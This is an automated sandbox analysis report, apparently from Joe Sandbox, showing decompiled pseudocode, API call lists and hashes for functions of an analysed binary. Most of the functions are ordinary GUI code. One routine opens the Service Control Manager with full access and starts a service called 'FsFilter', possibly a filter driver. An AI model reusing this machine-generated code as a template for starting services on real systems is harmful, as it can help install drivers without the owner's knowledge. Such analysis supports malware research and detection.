								 *(_t301 - 0x60) =  *(E00CC19ED() + 0x1b0);
							}
							_t157 = IsRectEmpty(_t285);
							__eflags = _t157;
							if(_t157 == 0) {
								_t289 = _t285;
							} else {
								_push( *(_t301 - 0x54));
								_t164 = PtInRect(_t225 + 0xc,  *(_t301 - 0x58));
								__eflags = _t164;
								if(_t164 == 0) {
									_t293 = _t225 + 0xc;
									asm("cdq");
									_t171 =  *(_t301 - 0x54) -  *((intOrPtr*)(_t225 + 0x10)) - 5;
									__eflags = _t171;
									OffsetRect(_t225 + 0xc,  *(_t301 - 0x58) - ( *((intOrPtr*)(_t225 + 0x14)) -  *(_t225 + 0xc) >> 1) - _t293->left, _t171);
								}
								_t289 = _t225 + 0xc;
							}
							__eflags =  *(_t301 - 0x68);
							_t278 = _t301 - 0x40;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							if(__eflags == 0) {
								L62:
								_push( *(_t225 + 0x40));
								_t289 =  *(_t301 - 0x60);
								_push(_t289);
								_push( *(_t301 - 0x5c));
								_push(_t301 - 0x40);
								_push(_t301 - 0x50);
								E00D586F0(_t225, _t225, 0, _t278, _t289, __eflags);
								 *(_t225 + 0x40) = _t289;
								goto L63;
							} else {
								__eflags = IsRectEmpty(_t225 + 0x1c);
								if(__eflags != 0) {
									goto L63;
								}
								goto L62;
							}
						} else {
							_t278 = E00CACA6C(0xe2a530,  *_t289);
							if(_t278 == 0) {
								L47:
								__eflags =  *(_t301 - 0x64);
								if( *(_t301 - 0x64) == 0) {
									goto L52;
								}
								__eflags =  *(_t225 + 0x34) - 0xffffffff;
								if( *(_t225 + 0x34) == 0xffffffff) {
									__eflags =  *(_t301 - 0x5c);
									if( *(_t301 - 0x5c) == 0) {
										E00D5893C(_t225, _t225, 0, _t289, 0);
									}
									L00D5877D(_t225,  *_t289, 0);
									 *(_t225 + 0x34) = 1;
								}
								goto L63;
							}
							if( *(_t301 - 0x64) == 0) {
								goto L52;
							}
							 *0xe17a64();
							if( *((intOrPtr*)( *((intOrPtr*)( *_t278 + 0x3a8))))() <= 1) {
								L43:
								 *0xe17a64();
								if( *((intOrPtr*)( *((intOrPtr*)( *_t278 + 0x3a8))))() <= 0) {
									L46:
									_t289 = _t225 + 0x4c;
									goto L47;
								}
								_t289 =  *( *_t278 + 0x3ac);
								 *0xe17a64();
								_t184 =  *( *( *_t278 + 0x3ac))();
								_t333 = _t184;
								if(_t184 != 0) {
									goto L46;
								}
								L45:
								_push( *(_t301 - 0x5c));
								_push(_t278);
								E00D58F7D(_t225, _t225, 0, _t278, _t289, _t333);
								goto L63;
							}
							_t289 =  *( *_t278 + 0x3ac);
							 *0xe17a64();
							if( *( *( *_t278 + 0x3ac))() != 0) {
								goto L45;
							}
							goto L43;
						}
					} else {
						goto L63;
					}
				}
			}

0x00d58aea
0x00d58aea
0x00d58af1
0x00d58af6
0x00d58af8
0x00d58afa
0x00d58b00
0x00d58f75
0x00d58f7a
0x00d58b0f
0x00d58b0f
0x00d58b12
0x00d58b22
0x00d58b25
0x00d58b28
0x00d58b2b
0x00d58b2d
0x00d58b3e
0x00d58b2f
0x00d58b31
0x00d58b36
0x00d58b36
0x00d58b40
0x00d58b44
0x00d58b46
0x00d58b4b
0x00d58b4e
0x00d58b51
0x00d58b54
0x00d58b5a
0x00d58b5f
0x00d58b62
0x00d58b67
0x00d58b6c
0x00d58b71
0x00d58b76
0x00d58b76
0x00d58b93
0x00d58b9b
0x00d58b9b
0x00d58b9d
0x00d58ba6
0x00d58bac
0x00d58bb0
0x00d58bb5
0x00d58bc8
0x00d58bcb
0x00d58bd6
0x00d58c04
0x00d58c07
0x00d58c18
0x00d58c18
0x00d58c1d
0x00d58c24
0x00d58c25
0x00d58c26
0x00d58c27
0x00d58c28
0x00d58c39
0x00d58c47
0x00d58c4c
0x00d58c51
0x00d58c63
0x00d58c68
0x00d58c6a
0x00d58c7e
0x00d58c84
0x00d58c96
0x00d58c9e
0x00d58ca0
0x00d58ca2
0x00d58cb3
0x00d58cbf
0x00d58cbf
0x00d58cc5
0x00d58cc5
0x00d58cc8
0x00d58cd2
0x00d58cd8
0x00d58cda
0x00d58ce0
0x00d58ce5
0x00d58ce5
0x00d58cea
0x00d58cea
0x00d58cda
0x00d58c53
0x00d58c57
0x00d58c57
0x00d58cf0
0x00d58cf0
0x00d58cf9
0x00d58cfc
0x00d58cfe
0x00d58d01
0x00d58d04
0x00d58d07
0x00d58d0a
0x00d58d11
0x00d58d17
0x00d58d1c
0x00d58d21
0x00d58d23
0x00d58d2b
0x00d58d37
0x00d58d37
0x00d58d2b
0x00d58d50
0x00d58d57
0x00d58d6c
0x00d58d71
0x00d58d71
0x00d58d82
0x00d58d8a
0x00d58da5
0x00d58db8
0x00d58dc2
0x00d58dc4
0x00d58dc4
0x00d58dca
0x00d58ea0
0x00d58eaa
0x00d58ebc
0x00d58ebd
0x00d58ec0
0x00d58ec3
0x00d58ec4
0x00d58ec5
0x00d58ec6
0x00d58eca
0x00d58ed0
0x00d58ed2
0x00d58eef
0x00d58ed4
0x00d58edf
0x00d58edf
0x00d58ef3
0x00d58ef9
0x00d58efb
0x00d58f3c
0x00d58efd
0x00d58efd
0x00d58f07
0x00d58f0d
0x00d58f0f
0x00d58f14
0x00d58f1c
0x00d58f2b
0x00d58f2b
0x00d58f31
0x00d58f31
0x00d58f37
0x00d58f37
0x00d58f3e
0x00d58f42
0x00d58f45
0x00d58f46
0x00d58f47
0x00d58f48
0x00d58f49
0x00d58f59
0x00d58f59
0x00d58f5c
0x00d58f62
0x00d58f63
0x00d58f68
0x00d58f6c
0x00d58f6d
0x00d58f72
0x00000000
0x00d58f4b
0x00d58f55
0x00d58f57
0x00000000
0x00000000
0x00000000
0x00d58f57
0x00d58dd8
0x00d58de4
0x00d58dea
0x00d58e6a
0x00d58e6a
0x00d58e6e
0x00000000
0x00000000
0x00d58e70
0x00d58e74
0x00d58e7a
0x00d58e7e
0x00d58e84
0x00d58e84
0x00d58e8f
0x00d58e94
0x00d58e94
0x00000000
0x00d58e74
0x00d58df0
0x00000000
0x00000000
0x00d58e00
0x00d58e0d
0x00d58e27
0x00d58e31
0x00d58e3d
0x00d58e67
0x00d58e67
0x00000000
0x00d58e67
0x00d58e41
0x00d58e49
0x00d58e51
0x00d58e53
0x00d58e55
0x00000000
0x00000000
0x00d58e57
0x00d58e57
0x00d58e5c
0x00d58e5d
0x00000000
0x00d58e5d
0x00d58e11
0x00d58e19
0x00d58e25
0x00000000
0x00000000
0x00000000
0x00d58e25
0x00000000
0x00000000
0x00000000
0x00d58bd6

APIs

__EH_prolog3_GS.LIBCMT ref: 00D58AF1
GetCursorPos.USER32(?), ref: 00D58BB5
IsRectEmpty.USER32 ref: 00D58BE9
IsRectEmpty.USER32 ref: 00D58C10
IsRectEmpty.USER32 ref: 00D58C2C
GetWindowRect.USER32 ref: 00D58C57
GetWindowRect.USER32 ref: 00D58C84
PtInRect.USER32(?,?,?), ref: 00D58CD2
OffsetRect.USER32(?,?,00000000), ref: 00D58CEA

Part of subcall function 00D86D8E: __EH_prolog3.LIBCMT ref: 00D86D95
Part of subcall function 00D86D8E: SetRectEmpty.USER32 ref: 00D86E95
Part of subcall function 00D86D8E: SetRectEmpty.USER32(?), ref: 00D86E9C

SetRectEmpty.USER32(?), ref: 00D58D11
OffsetRect.USER32(?,?,?), ref: 00D58EAA
IsRectEmpty.USER32 ref: 00D58ECA
IsRectEmpty.USER32 ref: 00D58EF3
PtInRect.USER32(?,00000000,00000000), ref: 00D58F07
OffsetRect.USER32(?,00000000,?), ref: 00D58F31
IsRectEmpty.USER32 ref: 00D58F4F

Part of subcall function 00D5893C: SetRectEmpty.USER32(?), ref: 00D58991
Part of subcall function 00D5893C: IsRectEmpty.USER32 ref: 00D5899B
Part of subcall function 00D5893C: SetRectEmpty.USER32(?), ref: 00D589EE
Part of subcall function 00D5893C: SetRectEmpty.USER32(?), ref: 00D589F8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
String ID:
API String ID: 359163869-0
Opcode ID: ad8170ff8e86b1f925890865489dba33afb1f3cf91dbacfafa49157841b4c174
Instruction ID: b12f56e7e39bdbc066806444e6e5ebd5e72886940f249bc9780a039e7232cf4f
Opcode Fuzzy Hash: ad8170ff8e86b1f925890865489dba33afb1f3cf91dbacfafa49157841b4c174
Instruction Fuzzy Hash: 5DE18971A002059FDF15DFA4C988AAEBBB6FF48701F184069EC05BB295DF31E949DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CD4C4D Relevance: 24.2, APIs: 16, Instructions: 177
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CD4C4D(void* __ebx, void* __ecx, long __edi, void* __esi, void* __eflags) {
				void* _t56;
				char* _t71;
				long _t74;
				long _t75;
				long _t76;
				long _t77;
				long _t78;
				long _t80;
				int _t83;
				RECT* _t86;
				intOrPtr* _t87;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t95;
				void* _t101;
				void* _t102;

				_t99 = __edi;
				_push(0x2f4);
				E00DDD55F(0xe0a08c, __ebx, __edi, __esi);
				_t101 = __ecx;
				_t86 =  *(_t102 + 8);
				 *(_t102 - 0x2e4) = 0;
				if(_t86 == 0) {
					L31:
					return E00DDD50E(_t86, _t99, _t101);
				}
				_t99 = SendMessageA( *(__ecx + 0x20), 0x110a, 0, 0);
				SendMessageA( *(_t101 + 0x20), 0xb, 0, 0);
				_t56 = E00D1E175(_t86);
				_t105 = _t56;
				if(_t56 == 0) {
					L24:
					if(_t99 == 0) {
						_t86 = 0;
						__eflags = 0;
					} else {
						 *(_t101 + 0x84) = 1;
						SendMessageA( *(_t101 + 0x20), 0x110b, 9, _t99);
						if( *((intOrPtr*)(_t102 + 0xc)) != 0 && SendMessageA( *(_t101 + 0x20), 0x110a, 4, _t99) == 0) {
							SendMessageA( *(_t101 + 0x20), 0x1102, 2, _t99);
						}
						_t86 = 0;
						SendMessageA( *(_t101 + 0x20), 0x1114, 0, _t99);
						 *(_t101 + 0x84) = 0;
						 *(_t102 - 0x2e4) = 1;
					}
					SendMessageA( *(_t101 + 0x20), 0xb, 1, _t86);
					RedrawWindow( *(_t101 + 0x20), _t86, _t86, 0x105);
					goto L31;
				}
				E00CD3DF5(_t102 - 0x300, 0xa);
				_t91 =  *0xe885c8; // 0x0
				 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
				E00CCD43C(_t102 - 0x300, _t105, E00D1E0B1(_t86, _t91, _t99, _t101, _t86));
				_push(_t102 - 0x2d8);
				_push(_t86);
				while(1) {
					_t93 =  *0xe885c8; // 0x0
					if(E00D1E1C7(_t86, _t93, _t99, _t101) <= 0) {
						break;
					}
					E00CCD43C(_t102 - 0x300, __eflags,  *((intOrPtr*)(_t102 - 0x2d8)));
					_push(_t102 - 0x2d8);
					_push( *((intOrPtr*)(_t102 - 0x2d8)));
				}
				_t87 =  *((intOrPtr*)(_t102 - 0x2fc));
				while(_t87 != 0) {
					_t71 =  *(_t87 + 8);
					_t87 =  *_t87;
					 *(_t102 - 0x2dc) = _t71;
					__eflags = _t99;
					if(_t99 == 0) {
						L21:
						_t95 =  *0xe885c8; // 0x0
						E00D1E146(_t95, _t71);
						continue;
					}
					_t74 = SendMessageA( *(_t101 + 0x20), 0x110a, 4, _t99);
					__eflags = _t74;
					if(_t74 == 0) {
						SendMessageA( *(_t101 + 0x20), 0x1102, 2, _t99);
					}
					_t19 = _t102 - 0x2e0;
					 *_t19 =  *(_t102 - 0x2e0) & 0x00000000;
					__eflags =  *_t19;
					_t75 = SendMessageA( *(_t101 + 0x20), 0x110a, 4, _t99);
					 *(_t102 - 0x2d4) = _t75;
					while(1) {
						__eflags = _t75;
						if(_t75 == 0) {
							break;
						}
						_push(_t75);
						_t76 = E00CD75E3(_t101, _t101);
						__eflags = _t76;
						if(_t76 == 0) {
							L16:
							_t77 =  *(_t102 - 0x2d4);
							L17:
							_t75 = SendMessageA( *(_t101 + 0x20), 0x110a, 1, _t77);
							__eflags =  *(_t102 - 0x2e0);
							 *(_t102 - 0x2d4) = _t75;
							if( *(_t102 - 0x2e0) == 0) {
								continue;
							}
							L20:
							_t71 =  *(_t102 - 0x2dc);
							goto L21;
						}
						_t78 = SHGetFileInfoA( *(_t76 + 4), 0, _t102 - 0x2d0, 0x160, 0x208);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L16;
						}
						_t80 = SHGetFileInfoA( *(_t102 - 0x2dc), 0, _t102 - 0x170, 0x160, 0x208);
						__eflags = _t80;
						if(_t80 == 0) {
							goto L16;
						}
						_t83 = lstrcmpiA(_t102 - 0x2c4, _t102 - 0x164);
						__eflags = _t83;
						_t77 =  *(_t102 - 0x2d4);
						if(_t83 == 0) {
							 *(_t102 - 0x2e0) = 1;
							_t99 = _t77;
						}
						goto L17;
					}
					_t99 = 0;
					__eflags = 0;
					goto L20;
				}
				 *(_t102 - 4) = 1;
				 *((intOrPtr*)(_t102 - 0x300)) = 0xe1de00;
				E00CB8008(_t102 - 0x300);
				goto L24;
			}

0x00cd4c4d
0x00cd4c4d
0x00cd4c57
0x00cd4c5c
0x00cd4c5e
0x00cd4c63
0x00cd4c6b
0x00cd4ee4
0x00cd4ee9
0x00cd4ee9
0x00cd4c8a
0x00cd4c8c
0x00cd4c99
0x00cd4c9e
0x00cd4ca0
0x00cd4e4f
0x00cd4e51
0x00cd4ebe
0x00cd4ebe
0x00cd4e53
0x00cd4e5e
0x00cd4e68
0x00cd4e72
0x00cd4e94
0x00cd4e94
0x00cd4e9b
0x00cd4ea6
0x00cd4eac
0x00cd4eb2
0x00cd4eb2
0x00cd4ec8
0x00cd4ed8
0x00000000
0x00cd4ede
0x00cd4cae
0x00cd4cb3
0x00cd4cb9
0x00cd4cca
0x00cd4cd5
0x00cd4cd6
0x00cd4cf7
0x00cd4cf7
0x00cd4d04
0x00000000
0x00000000
0x00cd4ce5
0x00cd4cf0
0x00cd4cf1
0x00cd4cf1
0x00cd4d06
0x00cd4e2b
0x00cd4d11
0x00cd4d14
0x00cd4d16
0x00cd4d1c
0x00cd4d1e
0x00cd4e1f
0x00cd4e1f
0x00cd4e26
0x00000000
0x00cd4e26
0x00cd4d2f
0x00cd4d35
0x00cd4d37
0x00cd4d44
0x00cd4d44
0x00cd4d4a
0x00cd4d4a
0x00cd4d4a
0x00cd4d5c
0x00cd4d62
0x00cd4d68
0x00cd4d68
0x00cd4d6a
0x00000000
0x00000000
0x00cd4d70
0x00cd4d73
0x00cd4d78
0x00cd4d7a
0x00cd4deb
0x00cd4deb
0x00cd4df1
0x00cd4dfc
0x00cd4e02
0x00cd4e09
0x00cd4e0f
0x00000000
0x00000000
0x00cd4e19
0x00cd4e19
0x00000000
0x00cd4e19
0x00cd4d92
0x00cd4d98
0x00cd4d9a
0x00000000
0x00000000
0x00cd4db5
0x00cd4dbb
0x00cd4dbd
0x00000000
0x00000000
0x00cd4dcd
0x00cd4dd3
0x00cd4dd5
0x00cd4ddb
0x00cd4ddd
0x00cd4de7
0x00cd4de7
0x00000000
0x00cd4ddb
0x00cd4e17
0x00cd4e17
0x00000000
0x00cd4e17
0x00cd4e39
0x00cd4e40
0x00cd4e4a
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD4C57
SendMessageA.USER32(?,0000110A,00000000,00000000), ref: 00CD4C7B
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00CD4C8C
SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 00CD4D2F
SendMessageA.USER32(?,00001102,00000002,00000000), ref: 00CD4D44
SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 00CD4D5C
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000208,00000000), ref: 00CD4D92
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000208), ref: 00CD4DB5
lstrcmpiA.KERNEL32(?,?), ref: 00CD4DCD
SendMessageA.USER32(?,0000110A,00000001,?), ref: 00CD4DFC
SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00CD4E68
SendMessageA.USER32(?,0000110A,00000004,00000000), ref: 00CD4E7F
SendMessageA.USER32(?,00001102,00000002,00000000), ref: 00CD4E94
SendMessageA.USER32(?,00001114,00000000,00000000), ref: 00CD4EA6
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00CD4EC8
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000004), ref: 00CD4ED8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$FileInfo$H_prolog3_RedrawWindowlstrcmpi
String ID:
API String ID: 3933830903-0
Opcode ID: ef454bc8e2054480364c7dc709a9608f1f4bcff6584f3f0acd0b17dc71a08b03
Instruction ID: 313e8e38a2d4fc099d9711c2bf73a11b426d7dd48b0e99ced1fa719f34813d38
Opcode Fuzzy Hash: ef454bc8e2054480364c7dc709a9608f1f4bcff6584f3f0acd0b17dc71a08b03
Instruction Fuzzy Hash: 79611D71640315AFEB259F21DC49FDAB7B9FB04B41F00415AB749A62E1DBB09E84DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2EC5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 138
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CC2EC5(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16) {
				signed int _v8;
				intOrPtr _v20;
				long _t28;
				void* _t33;
				signed int _t35;
				signed int _t43;
				signed int _t47;
				void* _t56;
				int _t63;
				void* _t64;
				signed int _t68;
				signed short _t79;
				struct HWND__* _t88;
				intOrPtr _t90;
				signed int _t91;
				void* _t94;
				signed int _t95;
				intOrPtr _t96;

				_t66 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t88 = _a4;
				_t106 = _t88;
				if(_t88 == 0) {
					L20:
					_t28 = 0;
					__eflags = 0;
					goto L21;
				} else {
					_push(E00CAA535);
					_t70 = 0xe681ec;
					_t94 = E00CADB0E(__ebx, 0xe681ec, _t88, __esi, _t106);
					if(_t94 == 0) {
						E00CAA4E7(__ebx, 0xe681ec, _t88, _t94, __eflags);
						asm("int3");
						_push(4);
						E00DDD52C(0xe080e2, _t66, _t88, _t94);
						_t90 = 0xe681ec;
						_v20 = 0xe681ec;
						_t68 = 0;
						_v8 = 0;
						_t33 = E00CAA9F1();
						_v8 = _v8 | 0xffffffff;
						E00CA95DE(0, 0xe681ec, 0xe681ec, _t94, _t33);
						_t95 = _a4;
						_v8 = 1;
						_t35 = E00CA9C08(_t95);
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags = _t95;
							if(_t95 != 0) {
								_t68 = E00DEB04D(_t95);
							}
							_push(_t68);
							E00CAABD1(_t90, _t95);
						}
						return E00DDD4FA(_t90);
					} else {
						_t108 =  *((intOrPtr*)(_t94 + 0x18));
						if( *((intOrPtr*)(_t94 + 0x18)) != 0) {
							_t64 = E00CB27A9(0xe681ec, _t88, _t108, _t88);
							_t109 = _t64;
							if(_t64 == 0) {
								_t70 =  *((intOrPtr*)(_t94 + 0x18));
								E00CB5569( *((intOrPtr*)(_t94 + 0x18)), _t109, _t88);
								 *((intOrPtr*)(_t94 + 0x18)) = 0;
							}
						}
						_t96 = _a8;
						if(_t96 != 0x110) {
							__eflags = _t96 -  *0xe8709c; // 0x0
							if(__eflags == 0) {
								L24:
								SendMessageA(_t88, 0x111, 0xe146, 0);
								_t28 = 1;
							} else {
								__eflags = _t96 - 0x111;
								if(_t96 != 0x111) {
									L10:
									__eflags = _t96 - 0xc000;
									if(__eflags < 0) {
										goto L20;
									} else {
										_t91 = E00CB27A9(0x111, _t88, __eflags, _t88);
										__eflags = _t91;
										if(_t91 == 0) {
											goto L20;
										} else {
											_t43 = E00CACB0B(_t91, 0xe1b05c);
											__eflags = _t43;
											if(_t43 == 0) {
												L14:
												__eflags = _t96 -  *0xe87090; // 0x0
												if(__eflags != 0) {
													__eflags = _t96 -  *0xe87094; // 0x0
													if(__eflags != 0) {
														__eflags = _t96 -  *0xe8708c; // 0x0
														if(__eflags != 0) {
															__eflags = _t96 -  *0xe87098; // 0x0
															if(__eflags != 0) {
																goto L20;
															} else {
																 *0xe17a64();
																_t28 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x18c))))();
															}
														} else {
															_t79 = _a16;
															_t47 = _t79 >> 0x10;
															__eflags = _t47;
															 *0xe17a64(_a12, _t79 & 0x0000ffff, _t47);
															 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x198))))();
															goto L20;
														}
													} else {
														 *(_t91 + 0x2d0) = _a16;
														 *0xe17a64();
														_t28 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x194))))();
														 *(_t91 + 0x2d0) = 0;
													}
												} else {
													 *0xe17a64(_a16);
													_t28 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x190))))();
												}
											} else {
												_t56 = E00CC3D0F(_t91);
												__eflags =  *(_t56 + 0x34) & 0x00080000;
												if(( *(_t56 + 0x34) & 0x00080000) != 0) {
													goto L20;
												} else {
													goto L14;
												}
											}
										}
									}
								} else {
									__eflags = _a12 - 0x40e;
									if(_a12 == 0x40e) {
										goto L24;
									} else {
										goto L10;
									}
								}
							}
						} else {
							 *0xe8708c = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
							 *0xe87090 = RegisterWindowMessageA("commdlg_ShareViolation");
							 *0xe87094 = RegisterWindowMessageA("commdlg_FileNameOK");
							 *0xe87098 = RegisterWindowMessageA("commdlg_ColorOK");
							 *0xe8709c = RegisterWindowMessageA("commdlg_help");
							_t63 = RegisterWindowMessageA("commdlg_SetRGBColor");
							_push(_a16);
							 *0xe87088 = _t63;
							_push(_a12);
							_t28 = E00CBD063(_t70, _t96, _t88, _t96);
						}
						L21:
						return _t28;
					}
				}
			}

0x00cc2ec5
0x00cc2ec8
0x00cc2ec9
0x00cc2eca
0x00cc2ecb
0x00cc2ece
0x00cc2ed0
0x00cc3063
0x00cc3063
0x00cc3063
0x00000000
0x00cc2ed6
0x00cc2ed6
0x00cc2edb
0x00cc2ee5
0x00cc2ee9
0x00cc309d
0x00cc30a2
0x00cc30a3
0x00cc30aa
0x00cc30af
0x00cc30b1
0x00cc30b4
0x00cc30b6
0x00cc30b9
0x00cc30be
0x00cc30c5
0x00cc30ca
0x00cc30d0
0x00cc30d7
0x00cc30dc
0x00cc30de
0x00cc30e0
0x00cc30e2
0x00cc30eb
0x00cc30eb
0x00cc30ed
0x00cc30f1
0x00cc30f1
0x00cc30fd
0x00cc2eef
0x00cc2ef1
0x00cc2ef4
0x00cc2ef7
0x00cc2efc
0x00cc2efe
0x00cc2f00
0x00cc2f04
0x00cc2f09
0x00cc2f09
0x00cc2efe
0x00cc2f0c
0x00cc2f15
0x00cc2f8e
0x00cc2f94
0x00cc308a
0x00cc3092
0x00cc309a
0x00cc2f9a
0x00cc2f9a
0x00cc2f9c
0x00cc2fad
0x00cc2fad
0x00cc2fb3
0x00000000
0x00cc2fb9
0x00cc2fbf
0x00cc2fc1
0x00cc2fc3
0x00000000
0x00cc2fc9
0x00cc2fd0
0x00cc2fd5
0x00cc2fd7
0x00cc2fe9
0x00cc2fe9
0x00cc2fef
0x00cc300a
0x00cc3010
0x00cc3037
0x00cc303d
0x00cc306c
0x00cc3072
0x00000000
0x00cc3074
0x00cc307e
0x00cc3086
0x00cc3086
0x00cc303f
0x00cc303f
0x00cc3046
0x00cc3046
0x00cc3059
0x00cc3061
0x00000000
0x00cc3061
0x00cc3012
0x00cc3015
0x00cc3025
0x00cc302d
0x00cc302f
0x00cc302f
0x00cc2ff1
0x00cc2ffe
0x00cc3006
0x00cc3006
0x00cc2fd9
0x00cc2fdb
0x00cc2fe0
0x00cc2fe7
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc2fe7
0x00cc2fd7
0x00cc2fc3
0x00cc2f9e
0x00cc2fa3
0x00cc2fa7
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc2fa7
0x00cc2f9c
0x00cc2f17
0x00cc2f27
0x00cc2f37
0x00cc2f47
0x00cc2f57
0x00cc2f67
0x00cc2f6c
0x00cc2f72
0x00cc2f75
0x00cc2f7a
0x00cc2f7f
0x00cc2f7f
0x00cc3065
0x00cc3069
0x00cc3069
0x00cc2ee9

APIs

Part of subcall function 00CADB0E: __EH_prolog3.LIBCMT ref: 00CADB15

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0000A535), ref: 00CC2F1C
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00CC2F2C
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 00CC2F3C
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 00CC2F4C
RegisterWindowMessageA.USER32(commdlg_help), ref: 00CC2F5C
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00CC2F6C
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 00CC3092

Part of subcall function 00CB5569: SetWindowLongA.USER32 ref: 00CB55AD

Strings

commdlg_FileNameOK, xrefs: 00CC2F32
commdlg_SetRGBColor, xrefs: 00CC2F62
commdlg_help, xrefs: 00CC2F52
commdlg_LBSelChangedNotify, xrefs: 00CC2F17
commdlg_ShareViolation, xrefs: 00CC2F22
commdlg_ColorOK, xrefs: 00CC2F42

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageWindow$Register$H_prolog3LongSend
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1550484310-3888057576
Opcode ID: 775699530b2ad0e5ecf22de9b5442a7bda0b4a8df39dd2f60b28eeb698d2c22c
Instruction ID: 90e9126f16052434c309dff781ac7ec03e327fdbe4fc08545e66956b917001a7
Opcode Fuzzy Hash: 775699530b2ad0e5ecf22de9b5442a7bda0b4a8df39dd2f60b28eeb698d2c22c
Instruction Fuzzy Hash: 0141C432B042159FCB21AF66EC89ABE77B1EB44710B14406DF96AB3250CB34DE45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8F7C Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00CA8F7C() {
				int _t3;
				void* _t7;
				long _t10;
				void* _t18;
				void* _t20;

				_t18 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t18 != 0) {
					_t20 = OpenServiceA(_t18, "FsFilter", 0xf01ff);
					_push(0);
					if(_t20 != 0) {
						_t3 = StartServiceA(_t20, 0, ??);
						_push(_t20);
						if(_t3 != 0) {
							CloseServiceHandle();
							CloseServiceHandle(_t18);
							_t7 = 1;
						} else {
							CloseServiceHandle();
							CloseServiceHandle(_t18);
							_t10 = GetLastError();
							asm("sbb eax, eax");
							_t7 =  ~(_t10 - 0x420) + 1;
						}
					} else {
						CloseServiceHandle();
						CloseServiceHandle(_t18);
						_t7 = 0;
					}
					return _t7;
				}
				CloseServiceHandle(0);
				return 0;
			}

0x00ca8f8d
0x00ca8f91
0x00ca8fb0
0x00ca8fb2
0x00ca8fb5
0x00ca8fc8
0x00ca8fce
0x00ca8fd7
0x00ca8ff0
